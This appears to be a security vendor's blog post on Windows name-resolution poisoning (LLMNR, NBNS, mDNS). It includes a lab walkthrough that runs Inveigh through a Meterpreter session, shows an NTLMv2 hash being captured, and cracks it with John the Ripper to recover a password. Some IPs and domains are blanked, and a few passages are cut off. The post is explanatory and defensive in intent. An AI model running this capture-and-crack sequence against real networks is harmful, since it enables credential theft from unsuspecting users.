This Windows attack breaks active directory, your corporate VPN and lock screen.

Name-poisoning is a source of constant headaches, even for hardened Windows computers. They afford attackers a wide range of subtle avenues that can be difficult to defeat in practice. Our article about name poisoning sheds some light on this underrated topic.

The idea

The idea of name poisoning is to intercept name resolution requests from a system and fake the response. For example, if a user types "" into a web browser, the system will need to resolve that domain to an IP address to display the google web search. This regular operation of DNS happens all the time when web browsers on the Internet.

Normal name resolution

A major drawback of many name-resolution protocols is that they are not encrypted. This opens up the opportunity for an attack to perform an adversary-in-the-middle attack. If the attacker can get the DNS request, he can respond with a fake IP address. In the drawing below with

DNS Attack

This article will not discuss how to get this adversary-in-the-middle position. Actually, for the attack we are talking about is not even necessary. However, we will perform the same type of name poisoning without this kind of position. How is that feasible? The answer is broadcast traffic. Not every name resolution protocol is unicast like DNS. Unicast traffic is directed to one IP address, whereas broadcast traffic is destined to all IPs in the same subnet.

This allows the attacker to respond to a name resolution without an adversary-in-the-middle position.

Name poisoning

The shocker is that this is the default Windows behavior and can lead to many attacks. A subtle one is to steal the users' passwords even when the system uses a corporate VPN, or the screen is locked.

PCAP of the attack

Using the PacketSafari Analyzer, we can explore the attack on a network level. Check this link 🚀 PacketSafari Analysis 🚀 and click on play in the top-right corner.

Start analysis walkthrough

This video shows how to use the feature:

We can also get an overview and find other analyses in the analyses section PacketSafari Analysis

Example attack using inveigh and metasploit

The PCAP above was generated within a lab environment using the following sequence of commands in a Linux Kali.

Within the Meterpreter session, we load a Powershell

meterpreter > load powershell
Loading extension powershell... Success.

Then we import Inveigh into Powershell.

meterpreter > powershell_import /root/Inveigh.ps1
[+] File successfully imported. No result was returned.

Start a Powershell shell

meterpreter > powershell_shell

Now issue the Invoke-Inveigh command as follows:

PS > Invoke-Inveigh -ConsoleOutput Medium -ConsoleUnique N -NBNS Y -mDNS Y -RunTime 1
    [*] Inveigh 1.506 started at 2022-10-13T15:07:07
[+] Elevated Privilege Mode = Enabled
[+] Primary IP Address =
[+] Spoofer IP Address =
[+] ADIDNS Spoofer = Disabled
[+] DNS Spoofer = Enabled
[+] DNS TTL = 30 Seconds
[+] LLMNR Spoofer = Enabled
[+] LLMNR TTL = 30 Seconds
[+] mDNS Spoofer For Type QU = Enabled
[+] mDNS TTL = 120 Seconds
[+] NBNS Spoofer For Types 00,20 = Enabled
[+] NBNS TTL = 165 Seconds
[+] SMB Capture = Enabled
[+] HTTP Capture = Enabled
[+] HTTPS Capture = Disabled
[+] HTTP/HTTPS Authentication = NTLM
[+] WPAD Authentication = NTLM
[+] WPAD NTLM Authentication Ignore List = Firefox
[+] WPAD Response = Enabled
[+] Kerberos TGT Capture = Disabled
[+] Machine Account Capture = Disabled
[+] Console Output = Medium
[+] File Output = Disabled
[+] Run Time = 1 Minute
WARNING: [!] Run Stop-Inveigh to stop
[*] Press any key to stop console output
[+] [2022-10-13T15:07:55] DNS request for sent to [outgoing query]
[+] [2022-10-13T15:07:55] DNS request for sent to[outgoing query]
[+] [2022-10-13T15:07:55] DNS request for sent to [outgoing query]
[+] [2022-10-13T15:07:55] NBNS request for GOOGLECOM<00> received from [response sent]
[+] [2022-10-13T15:07:55] mDNS(QM) request googlecom.local received from [mDNS type disabled]
[+] [2022-10-13T15:07:55] mDNS(QM) request googlecom.local received from [mDNS type disabled]
[+] [2022-10-13T15:07:55] LLMNR request for googlecom received from [response sent]
[+] [2022-10-13T15:07:56] mDNS(QM) request googlecom.local received from [mDNS type disabled]
[+] [2022-10-13T15:07:58] mDNS(QM) request googlecom.local received from [mDNS type disabled]
[+] [2022-10-13T15:07:58] mDNS(QM) request googlecom.local received from [mDNS type disabled]
[+] [2022-10-13T15:07:58] LLMNR request for googlecom received from [response sent]
[+] [2022-10-13T15:07:58] TCP(80) SYN packet detected from
[+] [2022-10-13T15:07:58] HTTP(80) GET request for  received from
[+] [2022-10-13T15:07:59] TCP(80) SYN packet detected from
[*] [2022-10-13T15:07:59] HTTP(80) NTLM challenge 0F60942E5D4AD650 sent to
[+] [2022-10-13T15:07:59] HTTP(80) NTLMv2 captured for TRAINING\johndoe from
[*] [2022-10-13T15:08:09] Inveigh is exiting due to reaching run time

Copy it into a file /root/ntlmv2 :


With John we can crack the hash.

john /root/ntlmv2_oneline --wordlist=/usr/share/wordlists/metasploit/password.lst --rules=KoreLogic
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:06 0,00% (ETA: 2021-10-23 07:01) 0g/s 740823p/s 740823c/s 740823C/s 50Grimness..50Hematologist
0g 0:00:00:07 0,00% (ETA: 2021-10-22 04:59) 0g/s 833515p/s 833515c/s 833515C/s 66Bootless..66Caller
0g 0:00:00:08 0,00% (ETA: 2021-10-21 10:13) 0g/s 916102p/s 916102c/s 916102C/s 83Admissibly..83Annmarie
0g 0:00:00:09 0,00% (ETA: 2021-10-20 21:31) 0g/s 981948p/s 981948c/s 981948C/s 00biserial..00bronchitis
0g 0:00:00:10 0,00% (ETA: 2021-10-20 12:37) 0g/s 1034Kp/s 1034Kc/s 1034KC/s 17blowing..17bunkhouse
0g 0:00:00:33 0,01% (ETA: 2021-10-19 05:17) 0g/s 1271Kp/s 1271Kc/s 1271KC/s teething1984..tourniquet1984
0g 0:00:00:34 0,01% (ETA: 2021-10-19 04:44) 0g/s 1276Kp/s 1276Kc/s 1276KC/s Dingos2001..Dur2001
Unknown2013      (johndoe)
1g 0:00:00:34 DONE (2021-10-13 12:19) 0.02878g/s 1282Kp/s 1282Kc/s 1282KC/s Unfossilized2013..Vetted2013
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed

The password is Unknown2013


How to defend this? Check out our cybersecurity training. How to analyze PCAPs? Check out our PacketSafari Packet Analysis Training.